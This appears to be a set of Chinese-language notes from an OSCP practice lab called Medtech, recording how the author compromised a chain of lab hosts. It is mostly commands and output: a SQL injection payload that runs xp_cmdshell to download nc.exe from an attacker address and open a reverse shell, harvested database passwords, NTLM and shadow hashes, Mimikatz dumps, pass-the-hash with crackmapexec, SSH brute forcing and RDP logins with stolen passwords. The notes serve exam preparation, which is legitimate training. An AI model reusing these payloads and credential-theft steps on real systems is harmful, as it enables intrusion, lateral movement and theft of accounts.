OSCP-Medtech

Sqlmap GetShell

下载Nc 反弹Shell

admin';EXEC master..xp_cmdshell 'powershell wget http://192.168.45.224:88/shell/nc.exe -outfile c:\windows\temp\nc.exe'--

powershell wget http://1.1.1.1/nc.exe -outfile c:\windows\temp\nc.exe

admin';EXEC master..xp_cmdshell 'c:\windows\temp\nc.exe 192.168.45.224 1337 -e cmd'---

c:\windows\temp\nc.exe 1.1.1.1 1337 -e cmd

信息收集

写一句话密码权限不足

MSSQL 密码

c:\inetpub\wwwroot>type web.config
type web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.web>
<!--            <customErrors mode="On">
                <error statusCode="500" redirect="error.aspx"/>
                        <error statusCode="404" redirect="error.aspx"/>
                </customErrors> -->
    <customErrors mode="RemoteOnly" />
                <compilation debug="true" targetFramework="4.0">
                        <assemblies>
                                <add assembly="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
                                <add assembly="System.DirectoryServices.AccountManagement, Version=3.5.0.0, Culture=neutral, PublicKeyToken=B77A5C561934E089" />
                                <add assembly="System.DirectoryServices.Protocols, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" />
                        </assemblies>
                </compilation>
        </system.web>
        <system.webServer>
        <defaultDocument>
            <files>
                <clear />
                <add value="index.html" />
                <add value="index.htm" />
                <add value="default.aspx" />
            </files>
        </defaultDocument>
    </system.webServer>
        <connectionStrings>
                <add name="myConnectionString" connectionString="server=localhost\SQLEXPRESS;database=webapp;uid=sa;password=WhileChirpTuesday218;Trusted_Connection=False;MultipleActiveResultSets=true; Integrated Security=False; Max Pool Size=500;" />
        </connectionStrings>
</configuration>

用户名

IP信息

系统信息

定位域控

User

Administrator
Guest
joe
krbtgt
leon
mario
offsec
peach
wario
yoshi

Pass

Flowers1
lab
point145dream
WhileChirpTuesday218

BadPotato 提权拿下WEB01 121

拿下FILES02 11

Impcaket

crackmapexec

信息收集，找到NTLM

type fileMonitorBackup.log | findstr NTLM
   88934 Oct 04 11:21  Backup      daisy                        6872 Backup Completed. NTLM: abf36048c1cf88f5603381c5128feb8e 
   88605 Oct 04 11:21  Backup      toad                         6872 Backup Completed. NTLM: 5be63a865b65349851c1f11a067a3068                                                                                    
   88137 Oct 04 11:21  Backup      wario                        6872 Backup Completed. NTLM: fdf36048c1cf88f5630381c5e38feb8e          Mushroom!                                                                                                            
   87139 Oct 04 11:21  Backup      goomba                       6872 Backup Completed. NTLM: 8e9e1516818ce4e54247e71e71b5f436

拿下CLIENT02 83

proxychains4  crackmapexec winrm  172.16.192.1/24 -u wario -H fdf36048c1cf88f5630381c5e38feb8e -x "whoami"

提权

------------------- Hashdump passwords -----------------

Administrator:500:aad3b435b51404eeaad3b435b51404ee:00fd074ec24fd70c76727ee9b2d7aacd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9d5595c1747195754bbeb7969c357801:::
offsec:1001:aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::

------------------- Pypykatz passwords -----------------

[+] Shahash found !!!
Shahash: 8a2930d3a4a9620468d85825d4f35fac3502ce4d
Nthash: ca89c858303e929cb7b6b65c3453dae8
Login: CLIENT02$

拿下VPN 122

SSH爆破

offsec
password

提权

根据提示查看所有命令，查看历史命令并执行，提权成功

拿下 proof.txt

信息收集

可疑进程

# cat /root/scripts/.startup.py
import os
import time

if __name__ == '__main__':
    os.chdir('/etc/openvpn/server/')
    os.system('openvpn /etc/openvpn/server/server_mini.conf')


# 

# cat /etc/openvpn/server/server_mini.conf
dev tun
proto tcp-server
secret static.key

# cat /etc/shadow
root:$y$j9T$2pGfmLZ2kv0OMN7xs1QG21$6NibMN8YIZ794SpXXu9g3DMMJIZr95EFRVcs7xUs568:19268:0:99999:7:::
offsec:$y$j9T$cz8KelZ70XBw8aW0yGHDM1$dGUNrLYSuRA9Nzj4KGBF7dzCvQOZkO5lY.2fM2yjan3:19424:0:99999:7:::
mario:$y$j9T$WlF.5NfkOQ2xN4K9OPM2e1$X/wrPHU0zaz.dGUjFQGLj5nbrTfNpy0Hm6Xev04aUw8:19268:0:99999:7:::

拿下14

找到SSH私钥

直接ssh连接

ssh -i id_rsa [email protected]

拿下CLIENT01 82

使用RDP登陆成功

proxychains4 xfreerdp /v:172.16.218.82:3389 /u:yoshi /p:Mushroom!

直接管理员权限

获取proof.txt

Mimikatz 没抓到什么有用信息，使用自制文件搜索工具查询，发现目标文件

C:\Users\yoshi\Downloads>type C:\users\Administrator.MEDTECH\Searches\hole.txt
type C:\users\Administrator.MEDTECH\Searches\hole.txt
leon:rabbit!:)

拿下DEV04 12

proxychains4 xfreerdp /v:172.16.218.12:3389 /u:yoshi /p:Mushroom!

Mimikatz 抓密码，发现len账号密码

Authentication Id : 0 ; 363938 (00000000:00058da2)
Session           : Interactive from 1
User Name         : leon
Domain            : MEDTECH
Logon Server      : DC01
Logon Time        : 6/10/2023 9:30:34 AM
SID               : S-1-5-21-976142013-3766213998-138799841-1105
        msv :
         [00000003] Primary
         * Username : leon
         * Domain   : MEDTECH
         * NTLM     : 2e208ad146efda5bc44869025e06544a
         * SHA1     : 8d1c9e13d2d2c20dbee8b4eacb20b73f06573c96
         * DPAPI    : a7bad14f64c3cf0d7ae2b5f6392a0b6d
        tspkg :
        wdigest :
         * Username : leon
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : leon
         * Domain   : MEDTECH.COM
         * Password : rabbit:)